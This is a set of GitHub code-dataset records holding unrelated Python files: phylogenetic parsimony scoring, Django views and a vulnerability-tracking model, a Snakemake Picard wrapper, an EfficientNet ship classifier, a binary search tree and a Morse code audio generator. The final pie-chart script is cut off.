Deprecated: Python implementation \n of the Fitch algorithm; see fitch C++ module for \n a C++ implementation that is roughly four times faster. '''\n \n # Calculate parsimony score.\n total = 0\n porde = [x for x in postorder(topology.getRoot())]\n for profile in xrange(len(profiles)):\n posdata, local = {}, 0\n for node in porde:\n # If is leaf.\n if (len(node.children) == 0):\n posdata[node] = profiles.getForTaxa(profile,node.label)\n # Not a leaf.\n else:\n a = posdata[node.children[0].child]\n b = posdata[node.children[1].child]\n # Get intersection.\n X = set(a).intersection(set(b))\n # If intersection is nothing...\n if (len(X) == 0):\n # Cost goes up, take union.\n local += 1\n X = set(a).union(set(b))\n posdata[node] = X\n total += local*profiles.weight(profile)\n return total\n\ndef fitch(topology,alignment):\n \n ''' Perform the Fitch algorithm on a given\n tree topology and associated alignment. Deprecated: \n Python implementation of the Fitch algorithm; \n see fitch C++ module for a C++ implementation \n that is roughly four times faster. '''\n \n # Turn alignment sets into profiles.\n profiles = profile_set(alignment)\n if (len(profiles) == 0): return None\n return fitch_cost(topology,profiles)","repo_name":"AlexSafatli/Pylogeny","sub_path":"pylogeny/parsimony.py","file_name":"parsimony.py","file_ext":"py","file_size_in_byte":5539,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"27"} +{"seq_id":"74874347592","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom .models import machine\n\n# Create your views here.\ndef home(request):\n obj = None\n if request.method == \"POST\":\n name = request.POST.get('name')\n dtype = request.POST.get('type')\n print(\"Name = \",name, \"\\nDtype = \", dtype)\n obj = machine.objects.create(name=name, dtype=dtype)\n\n\n machines = machine.objects.all()\n if obj:\n context = {\n \"machines\" : machines,\n \"message\" : {\n \"name\" : obj.name, \n \"dtype\" : obj.dtype\n }\n }\n obj.save()\n else:\n context = {\n \"machines\" : machines\n }\n\n return render(request, 'home.html', context)\n\ndef detail(request, pk):\n try:\n machinedt = machine.objects.get(pk=pk)\n context = {\n \"machine\" : machinedt\n }\n return render(request, 'detail.html', context)\n except:\n return HttpResponse(\"This is not a valid machine ID\")","repo_name":"ksharma20/Challenges","sub_path":"Emvirt/Dj_dash/dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"71680938633","text":"from django.db import models\n\n\nclass POC(models.Model):\n result = models.CharField('취약여부', max_length=10, default='Y')\n auto_result = models.CharField('자동판단결과', max_length=10, blank=True, default='')\n vulnerability = models.ForeignKey('Vulnerability', related_name='pocs', on_delete=models.CASCADE,)\n point = models.TextField('취약항목', default='', blank=True)\n found_date = models.DateField('등록일자', null=True, blank=True)\n is_reported = models.BooleanField('전달', default=False)\n reported_date = models.DateField('전달일자',null=True,blank=True)\n is_patched = models.BooleanField('조치확인', default=False)\n patched_date = models.DateField('조치확인일자', null=True,blank=True)\n is_new = models.BooleanField('신규여부(신규/기존)',default=True,)\n note = models.TextField('비고', blank=True, default='')\n\n class Meta:\n ordering = ['pk']\n 
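# [editorial sketch] A self-contained miniature of the per-site Fitch pass that
# fitch_cost() in the parsimony.py record above performs (toy hard-coded tree; this is
# an illustration, not the module's API):
def fitch_merge(left, right):
    # combine two child state sets; a non-empty intersection costs nothing,
    # an empty one forces a substitution and takes the union
    inter = left & right
    return (inter, 0) if inter else (left | right, 1)

lc, c1 = fitch_merge({"A"}, {"C"})   # cherry (A,C): one change
rc, c2 = fitch_merge({"A"}, {"A"})   # cherry (A,A): no change
root, c3 = fitch_merge(lc, rc)       # {A,C} & {A} = {A}: no further change
assert c1 + c2 + c3 == 1             # parsimony score of ((A,C),(A,A)) is 1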
","repo_name":"zzado/flus-lite","sub_path":"backend/api/models/poc.py","file_name":"poc.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"69823712711","text":"import tempfile\nfrom snakemake.shell import shell\nfrom snakemake_wrapper_utils.java import get_java_opts\nfrom snakemake_wrapper_utils.base import WrapperBase\n\n\nclass Wrapper(WrapperBase):\n\n def __init__(self, snakemake) -> None:\n super().__init__(snakemake)\n\n def parser(self):\n # java options\n self.java_opts = get_java_opts(self.snakemake)\n self.log = self.snakemake.log_fmt_shell()\n\n bams = self.snakemake.input.bams\n if isinstance(bams, str):\n bams = [bams]\n self.bams = list(map(\"--INPUT {}\".format, bams))\n\n if self.snakemake.output.bam.endswith(\".cram\"):\n self.output = \"/dev/stdout\"\n if self.snakemake.params.embed_ref:\n view_options = \"-O cram,embed_ref\"\n else:\n view_options = \"-O cram\"\n self.convert = f\" | samtools view -@ {self.snakemake.threads} {view_options} \\\n --reference {self.snakemake.input.ref} -o {self.snakemake.output.bam}\"\n else:\n self.output = self.snakemake.output.bam\n self.convert = \"\"\n\n def run(self):\n with tempfile.TemporaryDirectory() as tmpdir:\n shell(\n \"(picard MarkDuplicates\" # Tool and its subcommand\n \" {self.java_opts}\" # Automatic java option\n \" {self.extra}\" # User defined parmeters\n \" {self.bams}\" # Input bam(s)\n \" --TMP_DIR {tmpdir}\"\n \" --OUTPUT {self.output}\" # Output bam\n \" --METRICS_FILE {self.snakemake.output.metrics}\" # Output metrics\n \" {self.convert} ) {self.log}\" # Logging\n )\n\n\nif __name__ == '__main__':\n Wrapper(snakemake)","repo_name":"dxsbiocc/Workflow","sub_path":"wrappers/picard/markduplicates/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"27"} +{"seq_id":"74629738951","text":"from tensorflow import keras\nimport tensorflow as tf\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.applications import EfficientNetB0\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nfrom tensorflow.python.client import device_lib\nimport os\nimport numpy as np\nfrom PIL import Image\nfrom datetime import datetime\nimport json\nfrom img_generator import ImageProcess\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\n# gpu name : /device:GPU:0\n\n\nclass EfficientNet:\n def __init__(self, epoch, batch_size, classes):\n self.epochs = epoch\n self.batch_size = batch_size\n self.classes = classes\n self.img_size = (224, 224)\n self.class_list = []\n os.environ['TF_XLA_FLAGS'] = '--tf_xla_enable_xla_devices'\n\n def training_model(self, train_ds, val_ds):\n device_lib.list_local_devices()\n tf.config.list_physical_devices('GPU')\n model = EfficientNetB0(include_top=True,\n weights=None,\n input_shape=(224, 224, 3),\n classes=self.classes,\n classifier_activation='softmax')\n\n model.compile(loss='sparse_categorical_crossentropy',\n optimizer=Adam(lr=0.00005),\n metrics=['acc'])\n\n save_name = str(datetime.today().year) + str(datetime.today().month) + str(datetime.today().day) + str(datetime.today().hour) + str(datetime.today().minute)\n es = EarlyStopping(monitor='val_loss', patience=5)\n mc = ModelCheckpoint(os.getcwd().replace('\\\\', '/') + '/save_model/ship_classfication_v' + save_name + '.h5', save_best_only=True)\n history = 
model.fit(train_ds,\n validation_data=val_ds,\n epochs=self.epochs,\n #batch_size=self.batch_size,\n callbacks=[es, mc])\n history_dict = history.history\n json.dump(history_dict, open(os.getcwd().replace('\\\\', '/') + '/acc_history/acc_history_v' + save_name + '.txt', 'w'))\n\n # class_list = os.listdir(os.getcwd().replace('\\\\', '/') + '/dataset/gen_img')\n _file = open(os.getcwd().replace('\\\\', '/') + '/class_history/class_history_v' + save_name + '.txt', 'w')\n for i in self.class_list:\n _file.write(i + '\\n')\n _file.close()\n\n def data_setting(self):\n base_path = os.getcwd().replace('\\\\', '/') + '/dataset/gen_img'\n # data_target = []\n # total_img_len = 0\n # ready_ship = os.listdir(base_path)\n # for i in range(self.classes):\n # ship_img_len = len(os.listdir(base_path + '/' + ready_ship[i] + '/'))\n # for k in range(ship_img_len):\n # data_target.append(i)\n # total_img_len = total_img_len + ship_img_len\n # data_target = np.array(data_target)\n # data_input = np.ndarray(shape=(total_img_len, 224, 224, 3), dtype=np.float32)\n # index = 0\n # image_size = (224, 224)\n # for i in ready_ship:\n # path = base_path + '/' + i + '/'\n # img_name = os.listdir(path)\n # for name in img_name:\n # image = Image.open(path + name)\n # image = image.resize((224, 224))\n # image = np.asarray(image)\n # image = image / 255.0\n # data_input[index] = image\n # index = index + 1\n # print('이미지 넣는중 {0}/{1}'.format(index, total_img_len))\n # train_input, test_input, train_target, test_target = train_test_split(data_input, data_target, test_size=0.2,\n # shuffle=True, stratify=data_target,\n train_ds = keras.preprocessing.image_dataset_from_directory(\n base_path,\n validation_split=0.2,\n subset='training',\n seed=123,\n image_size=self.img_size,\n batch_size=self.batch_size\n )\n val_ds = keras.preprocessing.image_dataset_from_directory(\n base_path,\n validation_split=0.2,\n subset='validation',\n seed=123,\n image_size=self.img_size,\n batch_size=self.batch_size\n )\n self.class_list = train_ds.class_names\n AUTOTUNE = tf.data.experimental.AUTOTUNE\n train_ds = train_ds.cache().shuffle(1000).prefetch(buffer_size=AUTOTUNE)\n val_ds = val_ds.cache().prefetch(buffer_size=AUTOTUNE)\n normalization_layer = keras.layers.experimental.preprocessing.Rescaling(1./255)\n normalized_ds = train_ds.map(lambda x, y: (normalization_layer(x), y))\n return normalized_ds, val_ds\n\n @staticmethod\n def draw_graph(filename):\n with open(os.getcwd().replace('\\\\', '/') + '/acc_history/'+filename, 'r') as json_file:\n data = json.load(json_file)\n acc = data['acc']\n val_acc = data['val_acc']\n loss = data['loss']\n val_loss = data['val_loss']\n\n epochs = range(len(acc))\n plt.figure(figsize=(100, 100))\n plt.subplot(211)\n plt.plot(epochs, acc, 'r', label='Training accuracy')\n plt.plot(epochs, val_acc, 'b', label='Validation accuracy')\n plt.title('Training and validation accuracy')\n plt.legend(loc=0)\n\n plt.subplot(212)\n plt.plot(epochs, loss, 'r', label='Training loss')\n plt.plot(epochs, val_loss, 'b', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend(loc=0)\n\n plt.show()\n\n @staticmethod\n def predict_ship(image_array, model_name, ship_list):\n ship_data = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\n ship_data[0] = image_array\n model = tf.keras.models.load_model(model_name, compile=False)\n prediction = model.predict(ship_data)\n print(len(prediction[0]))\n # idx = np.argmax(prediction[0])\n # result = '{0} -> {1:0.2f}%'.format(ship_list[idx], 
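# [editorial sketch] predict_ship() just below ranks the top five classes by sorting a
# copy and calling list.index(), which returns the wrong index when probabilities tie.
# A tie-safe alternative (illustrative; not the module's own code):
import numpy as np

def top_k_labels(probs, labels, k=5):
    order = np.argsort(probs)[::-1][:k]  # indices of the k largest probabilities
    return [labels[i] for i in order]

assert top_k_labels(np.array([0.1, 0.5, 0.4]), ["a", "b", "c"], k=2) == ["b", "c"]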
prediction[0][idx])\n arr = prediction[0].tolist()\n sorted_list = sorted(arr)\n first = sorted_list[-1]\n second = sorted_list[-2]\n third = sorted_list[-3]\n forth = sorted_list[-4]\n fifth = sorted_list[-5]\n first_index = arr.index(first)\n second_index = arr.index(second)\n third_index = arr.index(third)\n forth_index = arr.index(forth)\n fifth_index = arr.index(fifth)\n result = [ship_list[first_index], ship_list[second_index], ship_list[third_index], ship_list[forth_index], ship_list[fifth_index]]\n return result\n","repo_name":"KangJuSeong/Ship_Classification_Program","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":6791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"27055802829","text":"from PIL import Image\nimport os\n\ninital_file_path = \"/Users/espresso/Documents/Projects/SkinCAM/input/better-smaller-database\"\ndest_path = \"/Users/espresso/Documents/Projects/SkinCAM/input/cropped_database\"\n\ndef image_cropper(current_image_path, new_image_path, number):\n image = Image.open(current_image_path)\n center_width = (image.size[0]) / 2\n center_height = (image.size[1]) / 2\n\n new_image = image.crop((\n center_width - 50,\n center_height - 50,\n center_width + 50,\n center_height + 50\n ))\n \n new_image.save(new_image_path+\"/{}.jpg\".format(number))\n # print(new_image_path+\"/{}.jpg\".format(number))\n return None\n\ndef file_iterator(file_path, list_images): # NOTE: list_dir is a boolean\n doublList = []\n image_folder_dirs = os.listdir(file_path)# ; print(image_folder_dirs)\n image_folder_dirs.sort()\n image_folder_dirs.remove(\".DS_Store\") if \".DS_Store\" in image_folder_dirs else None # NOTE: keyword pass doesn't work in place of 1\n image_folder_dirs = [os.path.join(file_path, image_folder) for image_folder in image_folder_dirs]\n for folder_ind in range(len(image_folder_dirs)): #for folder in image_folder_dirs: ? 
- NO because I use 'i' in feed_dict={Y:i}\n os.chdir(image_folder_dirs[folder_ind])\n if list_images:\n image_names = os.listdir()\n image_names.remove(\".DS_Store\") if \".DS_Store\" in image_names else None\n image_dir_list = [os.path.join(os.getcwd(), file_name) for file_name in image_names]\n doublList.append(image_dir_list)\n os.chdir(\"..\")\n if list_images:\n return doublList\n else:\n return image_folder_dirs\n\nuncropped_loc_list = file_iterator(inital_file_path, True)\n# print(uncropped_loc_list)\ndest_path_list = file_iterator(dest_path, False)\n# print(\"\\n\", dest_path_list)\n\ncounter, celerculter = 0, 0\n\nfor uncropped_list in uncropped_loc_list:\n for uncroppped_image_path in uncropped_list:\n celerculter += 1\n # print(dest_path_list[counter])\n # print(uncroppped_image_path)\n # exit()\n # print(uncroppped_image_path)\n image_cropper(uncroppped_image_path, dest_path_list[counter], celerculter)\n counter += 1\n","repo_name":"hbg/skinCAM-Python","sub_path":"utils/crop.py","file_name":"crop.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"27942066183","text":"from models.seq2seq import Seq2Seq\nfrom modules import EncoderRNN, AttnDecoderRNN\n\nclass RnnAttentionS2S(Seq2Seq):\n\n def __init__(self, input_lang, output_lang, max_length, hidden_size=256, device='cpu'):\n encoder = EncoderRNN(input_lang.n_words, hidden_size, device).to(device)\n decoder = AttnDecoderRNN(hidden_size, output_lang.n_words, max_length, dropout_p=0.1, device=device).to(device)\n super().__init__(encoder, decoder, input_lang, output_lang, device)\n\n","repo_name":"maximecolignon/pam","sub_path":"models/rnn_attention_s2s.py","file_name":"rnn_attention_s2s.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20286536187","text":"class BinarySearchTree:\n \"\"\"\n Property: Keys less than parent are found in the left tree, \n Keys greater than parent are found in the right tree.\n each subtree is a BST\n \"\"\"\n def __init__(self) -> None:\n self.root = None\n self.size = 0\n \n def length(self):\n return self.size\n \n def __len__(self):\n return self.size\n\n def __iter__(self):\n return self.root.__iter__()\n\n def put(self, key, val):\n if self.root:\n self._put(key,val,self.root)\n else:\n self.root = TreeNode(key, val)\n self.size += 1\n \n def _put(self, key, val, current_node):\n if key < current_node.key:\n if current_node.has_left_child():\n self._put(key, val, current_node.left_child)\n else:\n current_node.left_child = TreeNode(key, val, parent=current_node)\n else:\n if current_node.has_right_child():\n self._put(key, val, current_node.right_child)\n else:\n current_node.right_child = TreeNode(key, val, parent=current_node)\n \n def __setitem__(self, key, val):\n self.put(key, val)\n \n def get(self, key):\n if self.root:\n result = self._get(key, self.root)\n if result:\n return result.payload\n else:\n return None\n else:\n return None\n\n def _get(self, key, current_node):\n if not current_node:\n return None\n elif current_node.key == key:\n return current_node\n elif key < current_node.key:\n return self._get(key, current_node.left_child)\n else:\n return self._get(key, current_node.right_child)\n \n def __getitem__(self, key):\n return self.get(key=key)\n\n def __contains__(self, key):\n if self.get(key):\n return True\n else:\n return False\n \n def delete(self, key):\n if 
self.size > 1:\n            # _get() returns the node itself; get() would only return the payload\n            node_to_delete = self._get(key, self.root)\n            if node_to_delete:\n                self.remove(node_to_delete)\n                self.size -= 1\n            else:\n                raise KeyError(f\"Given key {key} not found in binary search tree.\")\n        elif self.size == 1 and self.root.key == key:\n            self.root = None\n            self.size -= 1\n        else:\n            raise KeyError(f\"Given key {key} not found in binary search tree.\")\n\n    def __delitem__(self, key):\n        self.delete(key)\n\n    def remove(self, node_to_remove):\n        if node_to_remove.is_leaf():\n            if node_to_remove.is_left_child():\n                node_to_remove.parent.left_child = None\n            else:\n                node_to_remove.parent.right_child = None\n        elif node_to_remove.has_both_children():\n            succ = node_to_remove.find_successor()\n            # Successor will be a node with 1 or zero children\n            succ.splice_out()\n            node_to_remove.key = succ.key\n            node_to_remove.payload = succ.payload\n        else:\n            if node_to_remove.has_left_child():\n                if node_to_remove.is_left_child():\n                    node_to_remove.left_child.parent = node_to_remove.parent\n                    node_to_remove.parent.left_child = node_to_remove.left_child\n                elif node_to_remove.is_right_child():\n                    node_to_remove.left_child.parent = node_to_remove.parent\n                    # promote the left child (the only child) into this node's spot\n                    node_to_remove.parent.right_child = node_to_remove.left_child\n                else:\n                    node_to_remove.replace_node_data(\n                        node_to_remove.left_child.key,\n                        node_to_remove.left_child.payload,\n                        node_to_remove.left_child.left_child,\n                        node_to_remove.left_child.right_child,\n                    )\n            else:\n                if node_to_remove.is_left_child():\n                    node_to_remove.right_child.parent = node_to_remove.parent\n                    node_to_remove.parent.left_child = node_to_remove.right_child\n                elif node_to_remove.is_right_child():\n                    node_to_remove.right_child.parent = node_to_remove.parent\n                    node_to_remove.parent.right_child = node_to_remove.right_child\n                else:\n                    node_to_remove.replace_node_data(\n                        node_to_remove.right_child.key,\n                        node_to_remove.right_child.payload,\n                        node_to_remove.right_child.left_child,\n                        node_to_remove.right_child.right_child,\n                    )\n        # size bookkeeping is handled by delete()\n\n    def __str__(self) -> str:\n        # Return the keys from an in-order traversal so that print(tree) works\n        if self.root:\n            return \", \".join(str(node) for node in self.root)\n        return \"\"\n\n\nclass TreeNode:\n    def __init__(self, key, val, left=None, right=None, parent=None, balance_factor=None) -> None:\n        self.key = key\n        self.payload = val\n        self.left_child = left\n        self.right_child = right\n        self.parent = parent\n        self.balance_factor = balance_factor\n    \n    def has_left_child(self):\n        return self.left_child\n    \n    def has_right_child(self):\n        return self.right_child\n    \n    def is_left_child(self):\n        return (self.parent and self.parent.left_child == self)\n    \n    def is_right_child(self):\n        return (self.parent and self.parent.right_child == self)\n    \n    def is_root(self):\n        return not self.parent\n    \n    def is_leaf(self):\n        return (not self.left_child and not self.right_child)\n    \n    def has_any_children(self):\n        return self.left_child or self.right_child\n    \n    def has_both_children(self):\n        return self.left_child and self.right_child\n    \n    def replace_node_data(self, key, val, lc, rc):\n        self.key = key\n        self.payload = val\n        self.left_child = lc\n        self.right_child = rc\n        if self.has_left_child():\n            self.left_child.parent = self\n        if self.has_right_child():\n            self.right_child.parent = self\n\n    def find_successor(self):\n        successor = None\n        if self.has_right_child():\n            successor = self.right_child.find_min()\n        else:\n            if self.parent:\n                if self.is_left_child():\n                    successor = self.parent\n                else:\n                    self.parent.right_child = None\n                    successor = self.parent.find_successor()\n                    self.parent.right_child = self\n        return successor\n    \n    def find_min(self):\n        current = self\n        while 
current.has_left_child():\n current = current.left_child\n return current\n \n def splice_out(self):\n if self.is_leaf():\n if self.is_left_child():\n self.parent.left_child = None\n else:\n self.parent.right_child = None\n else:\n if self.has_any_children():\n if self.has_left_child():\n if self.is_left_child():\n self.parent.left_child = self.left_child\n else:\n self.parent.right_child = self.left_child\n self.left_child.parent = self.parent\n else:\n if self.is_left_child():\n self.parent.left_child = self.right_child\n else:\n self.parent.right_child = self.right_child\n self.right_child.parent = self.parent\n\n def __iter__(self):\n if self:\n if self.has_left_child():\n for elem in self.left_child:\n yield elem\n yield self.key\n if self.has_right_child():\n for elem in self.right_child:\n yield elem\n\n\n\nif __name__ == \"__main__\":\n mytree = BinarySearchTree()\n mytree[3]=\"red\"\n mytree[4]=\"blue\"\n mytree[6]=\"yellow\"\n mytree[2]=\"black\"\n\n print(mytree)","repo_name":"dileepkr/datastructures","sub_path":"ds_trees/bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":8038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72407777352","text":"#!/usr/bin/env python3\nfrom argparse import ArgumentParser, FileType\nimport csv\nimport itertools\nimport math\nimport random\nimport struct\n\nimport wave\n\nSAMPWIDTH = 2 # 16-bit audio\n\nCHARS = {\n 'a': '.-',\n 'b': '-...',\n 'c': '-.-.',\n 'd': '-..',\n 'e': '.',\n 'f': '..-.',\n 'g': '--.',\n 'h': '....',\n 'i': '..',\n 'j': '.---',\n 'k': '-.-',\n 'l': '.-..',\n 'm': '--',\n 'n': '-.',\n 'o': '---',\n 'p': '.--.',\n 'q': '--.-',\n 'r': '.-.',\n 's': '...',\n 't': '-',\n 'u': '..-',\n 'v': '...-',\n 'w': '.--',\n 'x': '-..-',\n 'y': '-.--',\n 'z': '--..',\n '0': '-----',\n '1': '.----',\n '2': '..---',\n '3': '...--',\n '4': '....-',\n '5': '.....',\n '6': '-....',\n '7': '--...',\n '8': '---..',\n '9': '----.',\n ' ': ' ',\n ',': '--..--',\n '?': '..--..',\n '.': '.-.-.-',\n }\n\ndef normalise_char(char):\n if char.isspace():\n return ' '\n return char.lower()\n\ndef normalise_special_characters(char):\n from unidecode import unidecode\n return unidecode(char)\n\ndef char_to_cw(char, normalise):\n if normalise:\n char = normalise_special_characters(char)\n char = normalise_char(char)\n\n return CHARS[char]\n\ndef cycle_n(xs, n):\n length = len(xs)\n periods = math.floor(n / length)\n rest = n - periods * length\n return periods * xs + xs[:rest]\n\ndef sine_wave(frequency, duration, frame_rate=44100, amplitude=0.5):\n period = int(frame_rate / frequency)\n amp = min(max(amplitude, 0.0), 1.0)\n lookup_table = [amplitude *\n math.sin(2.0 * math.pi * frequency * (i%period) / frame_rate)\n for i in range(period)]\n\n return cycle_n(lookup_table, int(duration * frame_rate / 1000))\n\ndef noise_generator(kind, duration, frame_rate=44100, amplitude=0.5):\n from acoustics.generator import noise\n samples = noise(frame_rate, kind)\n samples = [s / 5 * amplitude for s in samples]\n\n return cycle_n(samples, int(duration * frame_rate / 1000))\n\ndef mix(*signals):\n return map(sum, zip(*signals))\n\nclass CWGenerator:\n def __init__(self,\n wpm,\n min_wpm,\n max_wpm,\n length_standard_deviation=0.0,\n length_drift=0.0,\n normalise_special_characters=False):\n self.wpm = wpm\n self.min_wpm = min_wpm\n self.max_wpm = max_wpm\n self.length_standard_deviation = length_standard_deviation\n self.length_drift = length_drift\n self.normalise_special_characters = 
normalise_special_characters\n\n def dot_length(self):\n length = math.floor(1200 / self.wpm)\n dev = length * self.length_standard_deviation\n length = max(0, min(max(length - dev, random.gauss(length, dev)), length + dev))\n return length\n\n def dash_length(self):\n return 3 * self.dot_length()\n\n def _produce_char(self, char):\n elems = char_to_cw(char, self.normalise_special_characters)\n i = 0\n for elem in elems:\n if elem == '.':\n yield (True, self.dot_length())\n elif elem == '-':\n yield (True, self.dash_length())\n elif elem == ' ':\n yield (False, self.dot_length() * 1)\n i += 1\n if i < len(elems):\n yield (False, self.dot_length())\n yield (False, self.dash_length())\n\n def drift(self):\n drift = random.gauss(1.0, self.length_drift)\n drift = min(max(drift, 1 - self.length_drift), 1 + self.length_drift)\n self.wpm *= drift\n if self.min_wpm is not None: self.wpm = max(self.min_wpm, self.wpm)\n if self.max_wpm is not None: self.wpm = min(self.max_wpm, self.wpm)\n\n def _produce(self, string):\n for char in string:\n yield from self._produce_char(char)\n self.drift()\n\n def produce(self, string):\n _on = False\n _duration = 0\n for on, duration in self._produce(string):\n if _on != on:\n if _duration != 0:\n yield (_on, _duration)\n _on = on\n _duration = 0\n _duration += duration\n if _on != False:\n yield (_on, _duration)\n\ndef generate_wav(stream, frame_rate=44100, frequency=600,\n noise_kind=None, noise_level=0.0):\n max_amp = int(2 ** (8 * SAMPWIDTH - 1)) - 1\n\n audio = []\n length = 0\n for on, duration in stream:\n audio.append(sine_wave(\n frequency=frequency,\n duration=duration,\n frame_rate=frame_rate,\n amplitude=0.5 * max_amp if on else 0.0))\n length += duration\n audio = [a for parts in audio for a in parts]\n if noise_level > 0.0:\n noise = noise_generator(\n noise_kind,\n length,\n frame_rate,\n noise_level * max_amp)\n audio = mix(audio, noise)\n audio = list(map(int, audio))\n frames = struct.pack('{0:d}h'.format(len(audio)), *audio)\n\n return frames\n\ndef main():\n parser = ArgumentParser(\n description='Generate CW (morse code) audio files from text')\n\n g_files = parser.add_argument_group('Input/Output')\n g_input = g_files.add_mutually_exclusive_group(required=True)\n g_input.add_argument('--text', '-t',\n help='Text to convert to morse code')\n g_input.add_argument('--input', '-i', type=FileType('r'),\n help='Read text from this file')\n g_files.add_argument('--wave', '-w', type=FileType('wb'),\n help='Write WAVE output to this file')\n g_files.add_argument('--frame-rate', type=int, default=22050,\n help='Frame rate in Hz (default: 22050)')\n g_files.add_argument('--csv', type=FileType('w'),\n help='Write CSV output to this file')\n g_files.add_argument('--quiet', '-q', action='store_true',\n help='Be more quiet')\n g_files.add_argument('--play', '-p', action='store_true',\n help='Playback')\n\n g_gen = parser.add_argument_group('CW Generation')\n g_gen.add_argument('--normalise-special-characters', '-c', action='store_true',\n help='Normalise special characters, like á to a')\n g_gen.add_argument('--frequency', '-f', type=int, default=600,\n help='Tone frequency in Hz (default: 600)')\n g_gen.add_argument('--wpm', '-s', type=int, default=12,\n help='Initial speed in WPM (default: 12)')\n g_gen.add_argument('--max-wpm', type=int, default=None,\n help='Maximum speed in WPM (default: none)')\n g_gen.add_argument('--min-wpm', type=int, default=None,\n help='Minimum speed in WPM (default: none)')\n g_gen.add_argument('--length-standard-deviation', 
'-d', type=float, default=0.0,\n help='Standard deviation from dotlength, '\n 'relative to the dot length (default: 0.0; sensible: < 0.2)')\n g_gen.add_argument('--length-drift', '-D', type=float, default=0.0,\n help='Speed drift (default: 0.0; suggested: 0.02)')\n\n g_noise = parser.add_argument_group('Noise Generation')\n g_noise.add_argument('--noise-kind', '-N', type=str, default='pink',\n help='Noise kind (default: pink; other values: white, blue, brown, violet)')\n g_noise.add_argument('--noise-level', '-n', type=float, default=0.0,\n help='Add noise with this amplitude (0 <= a <= 1; default: 0)')\n\n args = parser.parse_args()\n\n if not args.quiet:\n print('cwgen.py Copyright (C) 2018 Camil Staps')\n print('This program comes with ABSOLUTELY NO WARRANTY.')\n print('This is free software, and you are welcome to redistribute it under certain conditions.')\n print('See the LICENSE file for details.')\n\n gen = CWGenerator(\n wpm=args.wpm,\n min_wpm=args.min_wpm,\n max_wpm=args.max_wpm,\n length_standard_deviation=args.length_standard_deviation,\n length_drift=args.length_drift,\n normalise_special_characters=args.normalise_special_characters)\n\n if args.text is not None:\n text = args.text\n elif args.input is not None:\n text = args.input.read()\n stream = list(gen.produce(text))\n\n if args.csv is not None:\n wr = csv.writer(args.csv)\n for on, duration in stream:\n wr.writerow([1 if on else 0, int(duration)])\n\n if args.wave is not None or args.play:\n frames = generate_wav(stream, args.frame_rate, args.frequency,\n args.noise_kind, args.noise_level)\n\n if args.wave is not None:\n wav = wave.open(args.wave)\n wav.setnchannels(1)\n wav.setsampwidth(SAMPWIDTH)\n wav.setframerate(args.frame_rate)\n wav.writeframes(frames)\n if args.play:\n import pyaudio\n player = pyaudio.PyAudio()\n player = player.open(\n format=player.get_format_from_width(SAMPWIDTH),\n channels=1,\n rate=args.frame_rate,\n output=True)\n try:\n block_size = int(args.frame_rate / 4)\n while len(frames) > 0:\n data = frames[:block_size]\n frames = frames[block_size:]\n player.write(data)\n except KeyboardInterrupt:\n pass\n\nif __name__ == '__main__':\n main()\n","repo_name":"camilstaps/cwgen.py","sub_path":"cwgen.py","file_name":"cwgen.py","file_ext":"py","file_size_in_byte":9386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16569442975","text":"def check(ls):\n if(len(ls[0]) != len(ls[1])):\n return \"NO\"\n dic = {}\n for i in ls[0]:\n dic[i] = dic.get(i, 0) + 1\n for i in ls[1]:\n dic[i] = dic.get(i, 0) - 1\n for i in dic.keys():\n if dic[i] != 0:\n return \"NO\"\n return \"YES\"\n\n\nfor t in range(int(input())):\n words = input().split()\n print(check(words))\n","repo_name":"734mh4rdc0d3/GeeksForGeeks-Must-Do-Programming-","sub_path":"Strings/07/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26537375167","text":"import matplotlib.pyplot as plt\nimport csv\n\nx = []\ny = []\nwith open(\"first_touch_channel_customer_visited.csv\", \"r\") as csvfile:\n has_header = csv.Sniffer().has_header(csvfile.read(1024))\n csvfile.seek(0) \n plots = csv.reader(csvfile, delimiter = ',')\n #print(plots)\n if has_header:\n next(plots) # Skip header row.\n\n for row in plots:\n #print(row)\n x.append(row[0])\n y.append(int(row[1]))\n\n#plt.subplots_adjust(bottom=0.30)\n#plt.xticks(rotation = 70)\nplt.pie(y,labels = x, autopct = 
